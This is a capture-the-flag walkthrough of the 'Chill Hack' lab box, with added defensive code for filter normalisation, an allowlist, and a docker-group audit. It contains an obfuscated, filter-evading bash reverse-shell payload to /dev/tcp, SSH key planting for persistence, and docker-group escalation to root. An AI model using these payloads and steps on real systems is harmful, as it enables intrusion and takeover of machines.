# Chill Hack

## Nmap

```
sudo nmap 10.10.77.207 -p- -sS -sV

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
```

Port 80 takes us to the following page:

![](/files/-MVcV1Il-eGCxe6xGOdQ)

Running dirsearch against the target machine reveals a directory called secret.

![](/files/-MVcVFrWgna2l8d5sTib)

The following page for /secret/ contains a command box.

![](/files/-MVcVQLpp1o8cu8sC1su)

Running the id command shows we are running as www-data.

![](/files/-MVcVYTIwepM6bikyrkA)

Attempting to run binaries and commands such as `cat` is filtered, and the following page is presented instead.

![](/files/-MVcVk9aQXUIav-cCTVv)

The following page from <https://book.hacktricks.xyz/linux-unix/useful-linux-commands/bypass-bash-restrictions> lists multiple ways to attempt to bypass the filter. The first section, regarding reverse shells, shows a reliable method for gaining a shell.

```
echo "echo $(echo 'bash -i >& /dev/tcp/<IP>/<PORT> 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g'
```

Once the command has been run on the attacking machine take the output and run it on the command box on the target machine.

![](/files/-MVcWF6S9UVWu68pX9dj)

The output below was run on the target machine and `netcat` on my attacking machine caught a shell.

```
echo${IFS}WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhOQzR6TGpFd09DODRNQ0F3UGlZeENnPT0K|ba''se''6''4${IFS}-''d|ba''se''64${IFS}-''d|b''a''s''h
```
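The bypass works because the command box appears to use a substring denylist: splitting a keyword with empty quote pairs (`ba''se''64`) and replacing spaces with `${IFS}` leaves nothing for a literal match to hit. The following Python is an added example, not code from the writeup or the target; the denylist contents, the allowlist, and the sample payload are all constructed for illustration. It shows the naive filter missing the obfuscated form, a normalising detector that catches it, and the positive-validation approach that removes the problem altogether.

```python
import re
import subprocess

# Constructed denylist standing in for the /secret/ command box filter; the page only
# shows that "cat" and some binaries are rejected, so the exact list is an assumption.
BLOCKED = ("bash", "base64", "cat", "nc", "python", "sh")


def naive_filter_blocks(cmd: str) -> bool:
    """Substring denylist: rejects a command only if a blocked word appears literally."""
    return any(word in cmd for word in BLOCKED)


def normalize(cmd: str) -> str:
    """Undo the two tricks from the bypass above before matching: empty quote pairs
    ('' or "") that split a keyword, and $IFS / ${IFS} standing in for a space."""
    cmd = cmd.replace("''", "").replace('""', "")
    return re.sub(r"\$\{?IFS\}?", " ", cmd)


def normalized_filter_blocks(cmd: str) -> bool:
    """Denylist applied after normalisation: catches the split-keyword form, but is
    still a heuristic; an allowlist is the robust fix."""
    return naive_filter_blocks(normalize(cmd))


# Positive validation: a fixed set of bare commands, no arguments, no shell.
ALLOWED = {"id", "whoami", "uptime", "date"}


def allowlist_accepts(cmd: str) -> bool:
    """True only for an exact match on a permitted command name."""
    return cmd.strip() in ALLOWED


def run_allowed(cmd: str):
    """Run a permitted command without a shell; returns None when the input is rejected."""
    if not allowlist_accepts(cmd):
        return None
    result = subprocess.run([cmd.strip()], capture_output=True, text=True, check=False)
    return result.stdout


# Constructed payload in the same shape as the writeup's; "aWQK" is base64 of "id".
OBFUSCATED = "echo${IFS}aWQK|ba''se''6''4${IFS}-''d|b''a''s''h"

if __name__ == "__main__":
    print("naive denylist blocks it:     ", naive_filter_blocks(OBFUSCATED))
    print("normalised form:              ", normalize(OBFUSCATED))
    print("denylist after normalisation: ", normalized_filter_blocks(OBFUSCATED))
    print("allowlist accepts it:         ", allowlist_accepts(OBFUSCATED))
```

The normaliser is useful as a detection signal over web server logs or WAF input, but the design lesson is the last two functions: accept only an exact command name from a fixed set and invoke it with an argument list, never through a shell.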

![](/files/-MVcWUUTWZB9bOP9Bnx7)

Running linpeas.sh on the target machine reveals the following interesting information:

![](/files/-MVc_V6VLz9TNkSwzmb1)

Running `sudo -u apaar /home/apaar/.helpline.sh` produces an interactive shell script, which can be escaped by running `bash`.

![](/files/-MVc_hRxnY22UW06AIjm)

Linpeas shows a service is running locally on port 9001.

![](/files/-MVcnHUTft8fBexiCv4x)

We can drop an SSH public key onto the target machine to get SSH access as apaar, and then use SSH to forward the port to our attacking machine.

**Attacking machine**

```
ssh-keygen -t rsa
```

Hit enter until the command completes. Copy the contents of the `id_rsa.pub` file in the attacking machine's home directory and echo it into the `authorized_keys` file for the user apaar.

**Target machine**

```
echo '<Contents of attacking machine id_rsa.pub>' > /home/apaar/.ssh/authorized_keys
```

![](/files/-MVcnzwYx5MJW5sYIGXN)

We can then connect over SSH as the user apaar without specifying the password. Using the following syntax we can forward the target machine's local port 9001 to our attacking machine with SSH.

```
ssh -L 9001:127.0.0.1:9001 apaar@10.10.77.207  
```

We can then access <http://127.0.0.1:9001> in a web browser.

![http://127.0.0.1:9001/](/files/-MVcoqJR8D4VUtfEeATp)

Performing directory enumeration on this reveals the /images/ directory.

![](/files/-MVcp1pgu58kzSpVb-U9)

![http://127.0.0.1:9001/images/](/files/-MVcpAkarWoup_YxhRTE)

Saving the image file `hacker-with-laptop_23-2147985341.jpg` and running `steghide` reveals the following.

```
steghide --extract -sf ~/Desktop/hacker-with-laptop_23-2147985341.jpg 
```

![](/files/-MVcpVuMKjLDFwjEGlPq)

The archive `backup.zip` is password protected. Using `zip2john` we can create a hash and crack it with `john`.

```
/usr/sbin/zip2john /home/kali/backup.zip > /home/kali/Desktop/hash
```

![](/files/-MVcpeoiHXJyMsR-f1EI)

Extracting the contents reveals the file `source_code.php`.

![](/files/-MVcqg-U3oWkQeG-pNA0)

Decoding the base64 value found in it with `base64 -d` reveals the following:

```
echo 'IWQwbnRLbjB3bVlwQHNzdzByZA==' | base64 -d
!d0ntKn0wmYp@ssw0rd
```

We also have the user anurodh. These credentials can then be used to SSH in as anurodh.

![](/files/-MVeklNGg-unuuPLaa8x)

Viewing the groups anurodh is a member of, we see docker. Running the following command, taken from GTFOBins, gives us root access: <https://gtfobins.github.io/gtfobins/docker/>

```
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
```

![](/files/-MVel7Wc-hKH2gujpKz-)
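Membership in the docker group is effectively root, since any member can mount `/` into a container as the command above shows. The following POSIX shell helper is an added defensive check, not part of the writeup: it reports every account that belongs to the docker group or to comparable root-equivalent groups, reading an `/etc/group`-format file. The sample group file is constructed here so the check runs offline; on a real host you would pass `/etc/group`.

```shell
#!/bin/sh
# Added audit helper (not from the original writeup). Lists accounts that hold
# membership in groups that are equivalent to root on a typical Linux host:
# "docker" (mount / into a container), "lxd" (same trick via LXD) and "disk"
# (raw access to block devices).

ROOT_EQUIV_GROUPS="docker lxd disk"

# Usage: root_equiv_members <path-to-group-file>
# Prints one "group:user" line per member of each root-equivalent group.
root_equiv_members() {
    groupfile="$1"
    for g in $ROOT_EQUIV_GROUPS; do
        # /etc/group format: name:password:gid:member1,member2,...
        members=$(awk -F: -v grp="$g" '$1 == grp { print $4 }' "$groupfile")
        [ -z "$members" ] && continue
        echo "$members" | tr ',' '\n' | while read -r u; do
            [ -n "$u" ] && echo "$g:$u"
        done
    done
}

# Constructed sample group file modelled on the target's users (gids are made up).
SAMPLE_GROUP=$(mktemp)
cat > "$SAMPLE_GROUP" <<'EOF'
root:x:0:
adm:x:4:syslog,apaar
disk:x:6:
sudo:x:27:apaar
docker:x:999:anurodh
lxd:x:998:
anurodh:x:1002:
EOF

root_equiv_members "$SAMPLE_GROUP"
rm -f "$SAMPLE_GROUP"
```

Run against the sample it prints `docker:anurodh`, which is exactly the finding that turned the anurodh account into root on this box; an empty result on a production host is what you want to see unless the membership is deliberate and documented.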

